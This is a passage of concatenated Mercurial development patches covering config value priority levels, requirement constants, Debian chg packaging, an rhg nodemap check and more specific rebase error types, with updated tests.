2021 +0100 # Node ID a3dced4b7b04d06e82e6831fa77d04c0f68a2e28 # Parent d3df397e7a59b416ead210ebcac50579118a5c35 config: track the "level" of a value Config value now remember the "level" of the config that loaded it. This will be used to ensure good priority management for alias. Differential Revision: https://phab.mercurial-scm.org/D9926 diff --git a/mercurial/config.py b/mercurial/config.py --- a/mercurial/config.py +++ b/mercurial/config.py @@ -22,11 +22,19 @@ class config(object): def __init__(self, data=None): + self._current_source_level = 0 self._data = {} self._unset = [] if data: for k in data._data: self._data[k] = data[k].copy() + self._current_source_level = data._current_source_level + 1 + + def new_source(self): + """increment the source counter + + This is used to define source priority when reading""" + self._current_source_level += 1 def copy(self): return config(self) @@ -45,6 +53,9 @@ yield d def update(self, src): + current_level = self._current_source_level + current_level += 1 + max_level = self._current_source_level for s, n in src._unset: ds = self._data.get(s, None) if ds is not None and n in ds: @@ -56,7 +67,12 @@ self._data[s] = ds.preparewrite() else: self._data[s] = util.cowsortdict() - self._data[s].update(src._data[s]) + for k, v in src._data[s].items(): + value, source, level = v + level += current_level + max_level = max(level, current_level) + self._data[s][k] = (value, source, level) + self._current_source_level = max_level def _get(self, section, item): return self._data.get(section, {}).get(item) @@ -85,12 +101,18 @@ return b"" return result[1] + def level(self, section, item): + result = self._get(section, item) + if result is None: + return None + return result[2] + def sections(self): return sorted(self._data.keys()) def items(self, section): items = pycompat.iteritems(self._data.get(section, {})) - return [(k, v) for (k, (v, s)) in items] + return [(k, v[0]) for (k, v) in items] def set(self, section, item, value, 
source=b""): if pycompat.ispy3: @@ -107,7 +129,7 @@ self._data[section] = util.cowsortdict() else: self._data[section] = self._data[section].preparewrite() - self._data[section][item] = (value, source) + self._data[section][item] = (value, source, self._current_source_level) def alter(self, section, key, new_value): """alter a value without altering its source or level @@ -215,6 +237,7 @@ raise error.ConfigError(message, (b"%s:%d" % (src, line))) def read(self, path, fp=None, sections=None, remap=None): + self.new_source() if not fp: fp = util.posixfile(path, b'rb') assert ( @@ -229,6 +252,8 @@ def include(rel, remap, sections): abs = os.path.normpath(os.path.join(dir, rel)) self.read(abs, remap=remap, sections=sections) + # anything after the include has a higher level + self.new_source() self.parse( path, fp.read(), sections=sections, remap=remap, include=include diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -302,6 +302,11 @@ if k in self.environ: self._exportableenviron[k] = self.environ[k] + def _new_source(self): + self._ocfg.new_source() + self._tcfg.new_source() + self._ucfg.new_source() + @classmethod def load(cls): """Create a ui and load global and user configs""" @@ -313,6 +318,7 @@ elif t == b'resource': u.read_resource_config(f, trust=True) elif t == b'items': + u._new_source() sections = set() for section, name, value, source in f: # do not set u._ocfg @@ -325,6 +331,7 @@ else: raise error.ProgrammingError(b'unknown rctype: %s' % t) u._maybetweakdefaults() + u._new_source() # anything after that is a different level return u def _maybetweakdefaults(self): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1611919031 -3600 # Fri Jan 29 12:17:11 2021 +0100 # Node ID b91a695b3b084e3d676a5e6aa1f6192fecf4aa8e # Parent a3dced4b7b04d06e82e6831fa77d04c0f68a2e28 config: use level to properly deal with value priority A higher priority alias will now take precedence over lower 
priority ones. This was a requirements step before using alias more widely, especially to rename existing and established config option. Differential Revision: https://phab.mercurial-scm.org/D9927 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -662,11 +662,18 @@ msg %= (section, name, pycompat.bytestr(default)) self.develwarn(msg, 2, b'warn-config-default') + candidates = [] + config = self._data(untrusted) for s, n in alternates: - candidate = self._data(untrusted).get(s, n, None) + candidate = config.get(s, n, None) if candidate is not None: - value = candidate - break + candidates.append((s, n, candidate)) + if candidates: + + def level(x): + return config.level(x[0], x[1]) + + value = max(candidates, key=level)[2] if self.debugflag and not untrusted and self._reportuntrusted: for s, n in alternates: diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -476,15 +476,12 @@ earlier will be considered "lower level" and the config read later would be considered "higher level". And higher level values wins. -BROKEN: currently not the case. - $ HGRCPATH="file-A.rc" hg log -r . value-A $ HGRCPATH="file-B.rc" hg log -r . value-B $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . - value-A (known-bad-output !) - value-B (missing-correct-output !) + value-B Alias and include ----------------- @@ -493,15 +490,12 @@ See the case above for details about the two config options used. $ HGRCPATH="file-C.rc" hg log -r . - value-included (known-bad-output !) - value-C (missing-correct-output !) + value-C $ HGRCPATH="file-D.rc" hg log -r . - value-D (known-bad-output !) - value-included (missing-correct-output !) + value-included command line override --------------------- $ HGRCPATH="file-A.rc:file-B.rc" hg log -r . --config ui.logtemplate="value-CLI\n" - value-A (known-bad-output !) - value-CLI (missing-correct-output !) 
+ value-CLI # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729836 -3600 # Fri Feb 19 11:17:16 2021 +0100 # Node ID 357d2ea95ce9e5d2d24135489dd0d654c67816fc # Parent b91a695b3b084e3d676a5e6aa1f6192fecf4aa8e changegroup: use the local variable instead of reaching through self Gratuitous cleanup while I was here. Differential Revision: https://phab.mercurial-scm.org/D10023 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1009,7 +1009,7 @@ mfdicts = None if self._ellipses and self._isshallow: mfdicts = [ - (self._repo.manifestlog[n].read(), lr) + (repo.manifestlog[n].read(), lr) for (n, lr) in pycompat.iteritems(manifests) ] # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613657265 -3600 # Thu Feb 18 15:07:45 2021 +0100 # Node ID 3941fe53670dd57592ce3bfb31c5e4008b6e59da # Parent 357d2ea95ce9e5d2d24135489dd0d654c67816fc error: add `hint` attribute to `SidedataHashError` This prevents an exception within an exception because `hint` does not exist. Differential Revision: https://phab.mercurial-scm.org/D10024 diff --git a/mercurial/error.py b/mercurial/error.py --- a/mercurial/error.py +++ b/mercurial/error.py @@ -55,6 +55,7 @@ class SidedataHashError(RevlogError): def __init__(self, key, expected, got): + self.hint = None self.sidedatakey = key self.expecteddigest = expected self.actualdigest = got # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614776445 -3600 # Wed Mar 03 14:00:45 2021 +0100 # Node ID ee91966aec0ff3c957d3a4d86b66abf3d306a68c # Parent 3941fe53670dd57592ce3bfb31c5e4008b6e59da requirements: add constant for revlog v1 requirement Since this series is adding a new requirement, we might as well clean up while we're here. 
Differential Revision: https://phab.mercurial-scm.org/D10105 diff --git a/mercurial/exchangev2.py b/mercurial/exchangev2.py --- a/mercurial/exchangev2.py +++ b/mercurial/exchangev2.py @@ -22,6 +22,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, setdiscovery, ) from .interfaces import repository @@ -183,7 +184,7 @@ # TODO This is super hacky. There needs to be a storage API for this. We # also need to check for compatibility with the remote. - if b'revlogv1' not in repo.requirements: + if requirementsmod.REVLOGV1_REQUIREMENT not in repo.requirements: return False return True diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -974,7 +974,7 @@ # opener options for it because those options wouldn't do anything # meaningful on such old repos. if ( - b'revlogv1' in requirements + requirementsmod.REVLOGV1_REQUIREMENT in requirements or requirementsmod.REVLOGV2_REQUIREMENT in requirements ): options.update(resolverevlogstorevfsoptions(ui, requirements, features)) @@ -998,7 +998,7 @@ options = {} options[b'flagprocessors'] = {} - if b'revlogv1' in requirements: + if requirementsmod.REVLOGV1_REQUIREMENT in requirements: options[b'revlogv1'] = True if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True @@ -1199,7 +1199,7 @@ # being successful (repository sizes went up due to worse delta # chains), and the code was deleted in 4.6. 
supportedformats = { - b'revlogv1', + requirementsmod.REVLOGV1_REQUIREMENT, b'generaldelta', requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, @@ -3410,7 +3410,7 @@ % createopts[b'backend'] ) - requirements = {b'revlogv1'} + requirements = {requirementsmod.REVLOGV1_REQUIREMENT} if ui.configbool(b'format', b'usestore'): requirements.add(b'store') if ui.configbool(b'format', b'usefncache'): @@ -3458,7 +3458,7 @@ revlogv2 = ui.config(b'experimental', b'revlogv2') if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': - requirements.remove(b'revlogv1') + requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. requirements.discard(b'generaldelta') requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -21,6 +21,8 @@ # Stores manifest in Tree structure TREEMANIFEST_REQUIREMENT = b'treemanifest' +REVLOGV1_REQUIREMENT = b'revlogv1' + # Increment the sub-version when the revlog v2 format changes to lock out old # clients. REVLOGV2_REQUIREMENT = b'exp-revlogv2.1' diff --git a/mercurial/streamclone.py b/mercurial/streamclone.py --- a/mercurial/streamclone.py +++ b/mercurial/streamclone.py @@ -20,6 +20,7 @@ narrowspec, phases, pycompat, + requirements as requirementsmod, scmutil, store, util, @@ -83,7 +84,7 @@ # is advertised and contains a comma-delimited list of requirements. requirements = set() if remote.capable(b'stream'): - requirements.add(b'revlogv1') + requirements.add(requirementsmod.REVLOGV1_REQUIREMENT) else: streamreqs = remote.capable(b'streamreqs') # This is weird and shouldn't happen with modern servers. diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -857,7 +857,7 @@ """ return { # Introduced in Mercurial 0.9.2. 
- b'revlogv1', + requirements.REVLOGV1_REQUIREMENT, # Introduced in Mercurial 0.9.2. b'store', } @@ -937,7 +937,7 @@ b'dotencode', b'fncache', b'generaldelta', - b'revlogv1', + requirements.REVLOGV1_REQUIREMENT, b'store', requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -27,6 +27,7 @@ exchange, pushkey as pushkeymod, pycompat, + requirements as requirementsmod, streamclone, util, wireprototypes, @@ -310,7 +311,7 @@ caps.append(b'stream-preferred') requiredformats = repo.requirements & repo.supportedformats # if our local revlogs are just revlogv1, add 'stream' cap - if not requiredformats - {b'revlogv1'}: + if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}: caps.append(b'stream') # otherwise, add 'streamreqs' detailing our local revlog format else: # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1614771023 -3600 # Wed Mar 03 12:30:23 2021 +0100 # Node ID f4c325bf80fc4c7cd12d65f0489ea8f80e9db54c # Parent ee91966aec0ff3c957d3a4d86b66abf3d306a68c requirements: also add a generaldelta constant Continue the cleanup to the remaining requirements Differential Revision: https://phab.mercurial-scm.org/D10106 diff --git a/mercurial/bundlecaches.py b/mercurial/bundlecaches.py --- a/mercurial/bundlecaches.py +++ b/mercurial/bundlecaches.py @@ -9,6 +9,7 @@ from . import ( error, + requirements as requirementsmod, sslutil, util, ) @@ -164,7 +165,7 @@ compression = spec version = b'v1' # Generaldelta repos require v2. - if b'generaldelta' in repo.requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements: version = b'v2' # Modern compression engines require v2. 
if compression not in _bundlespecv1compengines: diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -1549,7 +1549,7 @@ # will support. For example, all hg versions that support generaldelta also # support changegroup 02. versions = supportedoutgoingversions(repo) - if b'generaldelta' in repo.requirements: + if requirements.GENERALDELTA_REQUIREMENT in repo.requirements: versions.discard(b'01') assert versions return min(versions) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -1003,7 +1003,7 @@ if requirementsmod.REVLOGV2_REQUIREMENT in requirements: options[b'revlogv2'] = True - if b'generaldelta' in requirements: + if requirementsmod.GENERALDELTA_REQUIREMENT in requirements: options[b'generaldelta'] = True # experimental config: format.chunkcachesize @@ -1200,7 +1200,7 @@ # chains), and the code was deleted in 4.6. supportedformats = { requirementsmod.REVLOGV1_REQUIREMENT, - b'generaldelta', + requirementsmod.GENERALDELTA_REQUIREMENT, requirementsmod.TREEMANIFEST_REQUIREMENT, requirementsmod.COPIESSDC_REQUIREMENT, requirementsmod.REVLOGV2_REQUIREMENT, @@ -3442,7 +3442,7 @@ requirements.add(b'exp-compression-%s' % compengine) if scmutil.gdinitconfig(ui): - requirements.add(b'generaldelta') + requirements.add(requirementsmod.GENERALDELTA_REQUIREMENT) if ui.configbool(b'format', b'sparse-revlog'): requirements.add(requirementsmod.SPARSEREVLOG_REQUIREMENT) @@ -3460,7 +3460,7 @@ if revlogv2 == b'enable-unstable-format-and-corrupt-my-data': requirements.remove(requirementsmod.REVLOGV1_REQUIREMENT) # generaldelta is implied by revlogv2. 
- requirements.discard(b'generaldelta') + requirements.discard(requirementsmod.GENERALDELTA_REQUIREMENT) requirements.add(requirementsmod.REVLOGV2_REQUIREMENT) # experimental config: format.internal-phase if ui.configbool(b'format', b'internal-phase'): diff --git a/mercurial/requirements.py b/mercurial/requirements.py --- a/mercurial/requirements.py +++ b/mercurial/requirements.py @@ -7,6 +7,8 @@ from __future__ import absolute_import +GENERALDELTA_REQUIREMENT = b'generaldelta' + # When narrowing is finalized and no longer subject to format changes, # we should move this to just "narrow" or similar. NARROW_REQUIREMENT = b'narrowhg-experimental' diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -20,7 +20,7 @@ # list of requirements that request a clone of all revlog if added/removed RECLONES_REQUIREMENTS = { - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, } @@ -236,7 +236,7 @@ class generaldelta(requirementformatvariant): name = b'generaldelta' - _requirement = b'generaldelta' + _requirement = requirements.GENERALDELTA_REQUIREMENT default = True @@ -936,7 +936,7 @@ supported = { b'dotencode', b'fncache', - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.REVLOGV1_REQUIREMENT, b'store', requirements.SPARSEREVLOG_REQUIREMENT, @@ -967,7 +967,7 @@ supported = { b'dotencode', b'fncache', - b'generaldelta', + requirements.GENERALDELTA_REQUIREMENT, requirements.SPARSEREVLOG_REQUIREMENT, requirements.SIDEDATA_REQUIREMENT, requirements.COPIESSDC_REQUIREMENT, diff --git a/mercurial/wireprotov1server.py b/mercurial/wireprotov1server.py --- a/mercurial/wireprotov1server.py +++ b/mercurial/wireprotov1server.py @@ -109,7 +109,7 @@ 4. 
server.bundle1 """ ui = repo.ui - gd = b'generaldelta' in repo.requirements + gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements if gd: v = ui.configbool(b'server', b'bundle1gd.%s' % action) # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614814278 -3600 # Thu Mar 04 00:31:18 2021 +0100 # Node ID 0a23ace80e5489563796222cd2b7ac1278e3850f # Parent f4c325bf80fc4c7cd12d65f0489ea8f80e9db54c relnotes: document a number of node->revision type changes Differential Revision: https://phab.mercurial-scm.org/D10103 diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -26,3 +26,8 @@ * `changelog.branchinfo` is deprecated and will be removed after 5.8. It is superseded by `changelogrevision.branchinfo`. + + * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook + now get a revision number as argument instead of a node. + + * revlog.addrevision returns the revision number instead of the node. # HG changeset patch # User Kyle Lippincott <spectral@google.com> # Date 1612488860 28800 # Thu Feb 04 17:34:20 2021 -0800 # Node ID 90481550467ca8d117678bf26cfc359a5b6e636a # Parent 0a23ace80e5489563796222cd2b7ac1278e3850f debian: support a "chg-first" installation mechanism (hg is actually chg) This mechanism builds chg such that it looks for `hg` to be available at /usr/lib/mercurial/hg instead of in the $PATH as `hg`, and makes the `hg` in /usr/bin be a symlink to `chg`. It's important to note that the hg binary must continue to be named `hg`. If we wanted to instead place it at /usr/bin/pyhg or something similar, we would need to modify Mercurial to allow that basename. Failure to do so would break Mercurial's shell aliases that use `hg`, `chg`, or `$HG`. I don't know if we should ever have a setup like this be the default setup, but I'm willing to get more information on our experience with it for making such a determination. 
Actually making it the default might be rather involved, as we don't maintain the official debian packaging rules. Differential Revision: https://phab.mercurial-scm.org/D10020 diff --git a/contrib/packaging/debian/rules b/contrib/packaging/debian/rules --- a/contrib/packaging/debian/rules +++ b/contrib/packaging/debian/rules @@ -18,6 +18,10 @@ # DEB_HG_PYTHON_VERSIONS="3.7 3.8" make deb DEB_HG_MULTI_VERSION?=0 +# Set to 1 to make /usr/bin/hg a symlink to chg, and move hg to +# /usr/lib/mercurial/hg. +DEB_HG_CHG_BY_DEFAULT?=0 + CPUS=$(shell cat /proc/cpuinfo | grep -E ^processor | wc -l) # By default, only build for the version of python3 that the system considers @@ -40,6 +44,12 @@ DEB_HG_PYTHON_VERSIONS?=$(shell py3versions -vd) endif +ifeq ($(DEB_HG_CHG_BY_DEFAULT), 1) + # Important: the "real" hg must have a 'basename' of 'hg'. Otherwise, hg + # behaves differently when setting $HG and breaks aliases that use that. + export HGPATH=/usr/lib/mercurial/hg +endif + export HGPYTHON3=1 export PYTHON=python3 @@ -86,3 +96,8 @@ cp contrib/bash_completion "$(CURDIR)"/debian/mercurial/usr/share/bash-completion/completions/hg mkdir -p "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions cp contrib/zsh_completion "$(CURDIR)"/debian/mercurial/usr/share/zsh/vendor-completions/_hg + if [[ "$(DEB_HG_CHG_BY_DEFAULT)" -eq 1 ]]; then \ + mkdir -p "$(CURDIR)"/debian/mercurial/usr/lib/mercurial; \ + mv "$(CURDIR)"/debian/mercurial/usr/bin/hg "$(CURDIR)"/debian/mercurial/usr/lib/mercurial/hg; \ + ln -s chg "$(CURDIR)"/debian/mercurial/usr/bin/hg; \ + fi # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614284952 -3600 # Thu Feb 25 21:29:12 2021 +0100 # Node ID 842f2372ced607f2c9292fcff88e3c8c16ed0da1 # Parent 90481550467ca8d117678bf26cfc359a5b6e636a rhg: Don’t attempt to read persistent nodemap without .hg/requires opt-in Differential Revision: https://phab.mercurial-scm.org/D10077 diff --git a/rust/hg-core/src/revlog/nodemap_docket.rs 
b/rust/hg-core/src/revlog/nodemap_docket.rs --- a/rust/hg-core/src/revlog/nodemap_docket.rs +++ b/rust/hg-core/src/revlog/nodemap_docket.rs @@ -1,4 +1,5 @@ use crate::errors::{HgError, HgResultExt}; +use crate::requirements; use bytes_cast::{unaligned, BytesCast}; use memmap::Mmap; use std::path::{Path, PathBuf}; @@ -38,6 +39,14 @@ repo: &Repo, index_path: &Path, ) -> Result<Option<(Self, Mmap)>, RevlogError> { + if !repo + .requirements() + .contains(requirements::NODEMAP_REQUIREMENT) + { + // If .hg/requires does not opt it, don’t try to open a nodemap + return Ok(None); + } + let docket_path = index_path.with_extension("n"); let docket_bytes = if let Some(bytes) = repo.store_vfs().read(&docket_path).io_not_found_as_none()? @@ -88,6 +97,8 @@ Err(HgError::corrupted("persistent nodemap too short").into()) } } else { + // Even if .hg/requires opted in, some revlogs are deemed small + // enough to not need a persistent nodemap. Ok(None) } } # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1614614091 -3600 # Mon Mar 01 16:54:51 2021 +0100 # Node ID 230f73019e49a0056c1863184c25932203ac8523 # Parent 842f2372ced607f2c9292fcff88e3c8c16ed0da1 changelog: rename parameters to reflect semantics `read` and `readfiles` can be used with a revision just as well, so follow the naming convention in revlog to reflect this. Differential Revision: https://phab.mercurial-scm.org/D10081 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -507,7 +507,7 @@ if not self._delayed: revlog.revlog._enforceinlinesize(self, tr, fp) - def read(self, node): + def read(self, nodeorrev): """Obtain data from a parsed changelog revision. Returns a 6-tuple of: @@ -523,7 +523,7 @@ ``changelogrevision`` instead, as it is faster for partial object access. 
""" - d, s = self._revisiondata(node) + d, s = self._revisiondata(nodeorrev) c = changelogrevision( d, s, self._copiesstorage == b'changeset-sidedata' ) @@ -536,11 +536,11 @@ text, sidedata, self._copiesstorage == b'changeset-sidedata' ) - def readfiles(self, node): + def readfiles(self, nodeorrev): """ short version of read that only returns the files modified by the cset """ - text = self.revision(node) + text = self.revision(nodeorrev) if not text: return [] last = text.index(b"\n\n") # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1611966792 28800 # Fri Jan 29 16:33:12 2021 -0800 # Node ID 9989a276712fe845513461aceb44073a68bc4c49 # Parent 230f73019e49a0056c1863184c25932203ac8523 errors: use more specific errors in rebase extension Differential Revision: https://phab.mercurial-scm.org/D9914 diff --git a/hgext/rebase.py b/hgext/rebase.py --- a/hgext/rebase.py +++ b/hgext/rebase.py @@ -144,7 +144,7 @@ return smartset.baseset() dests = destutil.orphanpossibledestination(repo, src) if len(dests) > 1: - raise error.Abort( + raise error.StateError( _(b"ambiguous automatic rebase: %r could end up on any of %r") % (src, dests) ) @@ -424,7 +424,7 @@ if self.collapsef: dests = set(self.destmap.values()) if len(dests) != 1: - raise error.Abort( + raise error.InputError( _(b'--collapse does not work with multiple destinations') ) destrev = next(iter(dests)) @@ -469,7 +469,7 @@ for rev in self.state: branches.add(repo[rev].branch()) if len(branches) > 1: - raise error.Abort( + raise error.InputError( _(b'cannot collapse multiple named branches') ) @@ -1093,10 +1093,10 @@ with repo.wlock(), repo.lock(): rbsrt.restorestatus() if rbsrt.collapsef: - raise error.Abort(_(b"cannot stop in --collapse session")) + raise error.StateError(_(b"cannot stop in --collapse session")) allowunstable = obsolete.isenabled(repo, obsolete.allowunstableopt) if not (rbsrt.keepf or allowunstable): - raise error.Abort( + raise error.StateError( _( b"cannot remove 
original changesets with" b" unrebased descendants" @@ -1220,14 +1220,16 @@ ) % help ) - raise error.Abort(msg) + raise error.InputError(msg) if rbsrt.collapsemsg and not rbsrt.collapsef: - raise error.Abort(_(b'message can only be specified with collapse')) + raise error.InputError( + _(b'message can only be specified with collapse') + ) if action: if rbsrt.collapsef: - raise error.Abort( + raise error.InputError( _(b'cannot use collapse with continue or abort') ) if action == b'abort' and opts.get(b'tool', False): @@ -1294,7 +1296,7 @@ cmdutil.bailifchanged(repo) if ui.configbool(b'commands', b'rebase.requiredest') and not destf: - raise error.Abort( + raise error.InputError( _(b'you must specify a destination'), hint=_(b'use: hg rebase -d REV'), ) @@ -1388,7 +1390,7 @@ return None if wdirrev in rebaseset: - raise error.Abort(_(b'cannot rebase the working copy')) + raise error.InputError(_(b'cannot rebase the working copy')) rebasingwcp = repo[b'.'].rev() in rebaseset ui.log( b"rebase", @@ -1426,7 +1428,7 @@ elif size == 0: ui.note(_(b'skipping %s - empty destination\n') % repo[r]) else: - raise error.Abort( + raise error.InputError( _(b'rebase destination for %s is not unique') % repo[r] ) @@ -1459,7 +1461,7 @@ return nullrev if len(parents) == 1: return parents.pop() - raise error.Abort( + raise error.StateError( _( b'unable to collapse on top of %d, there is more ' b'than one external parent: %s' @@ -1659,7 +1661,7 @@ b"to force the rebase please set " b"experimental.evolution.allowdivergence=True" ) - raise error.Abort(msg % (b",".join(divhashes),), hint=h) + raise error.StateError(msg % (b",".join(divhashes),), hint=h) def successorrevs(unfi, rev): @@ -1762,7 +1764,7 @@ # /| # None of A and B will be changed to D and rebase fails. # A B D if set(newps) == set(oldps) and dest not in newps: - raise error.Abort( + raise error.InputError( _( b'cannot rebase %d:%s without ' b'moving at least one of its parents' @@ -1774,7 +1776,7 @@ # impossible. 
With multi-dest, the initial check does not cover complex # cases since we don't have abstractions to dry-run rebase cheaply. if any(p != nullrev and isancestor(rev, p) for p in newps): - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) # Check if the merge will contain unwanted changes. That may happen if # there are multiple special (non-changelog ancestor) merge bases, which @@ -1836,7 +1838,7 @@ if revs is not None ) ) - raise error.Abort( + raise error.InputError( _(b'rebasing %d:%s will include unwanted changes from %s') % (rev, repo[rev], unwanteddesc) ) @@ -1981,7 +1983,7 @@ if destmap[r] not in srcset: result.append(r) if not result: - raise error.Abort(_(b'source and destination form a cycle')) + raise error.InputError(_(b'source and destination form a cycle')) srcset -= set(result) yield result @@ -2001,12 +2003,12 @@ if b'qtip' in repo.tags(): mqapplied = {repo[s.node].rev() for s in repo.mq.applied} if set(destmap.values()) & mqapplied: - raise error.Abort(_(b'cannot rebase onto an applied mq patch')) + raise error.StateError(_(b'cannot rebase onto an applied mq patch')) # Get "cycle" error early by exhausting the generator. sortedsrc = list(sortsource(destmap)) # a list of sorted revs if not sortedsrc: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) # Only check the first batch of revisions to rebase not depending on other # rebaseset. This means "source is ancestor of destination" for the second @@ -2014,7 +2016,7 @@ # "defineparents" to do that check. 
roots = list(repo.set(b'roots(%ld)', sortedsrc[0])) if not roots: - raise error.Abort(_(b'no matching revisions')) + raise error.InputError(_(b'no matching revisions')) def revof(r): return r.rev() @@ -2026,7 +2028,7 @@ dest = repo[destmap[root.rev()]] commonbase = root.ancestor(dest) if commonbase == root: - raise error.Abort(_(b'source is ancestor of destination')) + raise error.InputError(_(b'source is ancestor of destination')) if commonbase == dest: wctx = repo[None] if dest == wctx.p1(): @@ -2119,7 +2121,7 @@ if ui.configbool(b'commands', b'rebase.requiredest'): msg = _(b'rebase destination required by configuration') hint = _(b'use hg pull followed by hg rebase -d DEST') - raise error.Abort(msg, hint=hint) + raise error.InputError(msg, hint=hint) with repo.wlock(), repo.lock(): if opts.get('update'): @@ -2176,7 +2178,7 @@ commands.update(ui, repo) else: if opts.get('tool'): - raise error.Abort(_(b'--tool can only be used with --rebase')) + raise error.InputError(_(b'--tool can only be used with --rebase')) ret = orig(ui, repo, *args, **opts) return ret diff --git a/tests/test-rebase-collapse.t b/tests/test-rebase-collapse.t --- a/tests/test-rebase-collapse.t +++ b/tests/test-rebase-collapse.t @@ -134,7 +134,7 @@ $ hg rebase --base B -m 'custom message' abort: message can only be specified with collapse - [255] + [10] $ cat > $TESTTMP/checkeditform.sh <<EOF > env | grep HGEDITFORM @@ -180,7 +180,7 @@ $ hg rebase -s C --dest H --collapse abort: unable to collapse on top of 3, there is more than one external parent: 1, 6 - [255] + [20] Rebase and collapse - E onto H: @@ -386,7 +386,7 @@ BROKEN: should be allowed $ hg rebase --collapse -r 'B+D+F' -d G abort: unable to collapse on top of 2, there is more than one external parent: 3, 5 - [255] + [20] $ cd .. @@ -404,7 +404,7 @@ $ hg rebase --collapse -d H -s 'B+F' abort: unable to collapse on top of 5, there is more than one external parent: 1, 3 - [255] + [20] $ cd .. 
With internal merge: @@ -484,7 +484,7 @@ $ hg rebase --keepbranches --collapse -s 1 -d 3 abort: cannot collapse multiple named branches - [255] + [10] $ cd .. diff --git a/tests/test-rebase-dest.t b/tests/test-rebase-dest.t --- a/tests/test-rebase-dest.t +++ b/tests/test-rebase-dest.t @@ -18,7 +18,7 @@ $ hg rebase abort: you must specify a destination (use: hg rebase -d REV) - [255] + [10] $ hg rebase -d 1 rebasing 2:5db65b93a12b tip "cc" saved backup bundle to $TESTTMP/repo/.hg/strip-backup/5db65b93a12b-4fb789ec-rebase.hg @@ -74,7 +74,7 @@ $ hg pull --rebase abort: rebase destination required by configuration (use hg pull followed by hg rebase -d DEST) - [255] + [10] Setup rebase with multiple destinations @@ -152,7 +152,7 @@ > A D > EOS abort: --collapse does not work with multiple destinations - [255] + [10] Multiple destinations cannot be used with --base: @@ -192,7 +192,7 @@ > Z > EOS abort: rebase destination for f0a671a46792 is not unique - [255] + [10] Destination is an ancestor of source: @@ -204,7 +204,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] BUG: cycles aren't flagged correctly when --dry-run is set: $ rebasewithdag -s B -d 'SRC' --dry-run <<'EOS' @@ -216,7 +216,7 @@ > EOS abort: source and destination form a cycle starting dry-run rebase; repository will not be changed - [255] + [10] Switch roots: @@ -329,7 +329,7 @@ > Z > EOS abort: source and destination form a cycle - [255] + [10] Detect source is ancestor of dest in runtime: @@ -341,7 +341,7 @@ > A > EOS abort: source is ancestor of destination - [255] + [10] "Already rebased" fast path still works: diff --git a/tests/test-rebase-mq.t b/tests/test-rebase-mq.t --- a/tests/test-rebase-mq.t +++ b/tests/test-rebase-mq.t @@ -46,14 +46,14 @@ $ hg rebase -s 1 -d 3 abort: cannot rebase onto an applied mq patch - [255] + [20] Rebase - same thing, but mq patch is default dest: $ hg up -q 1 $ hg rebase abort: cannot rebase onto an applied mq patch - [255] + [20] $ hg up -q qtip 
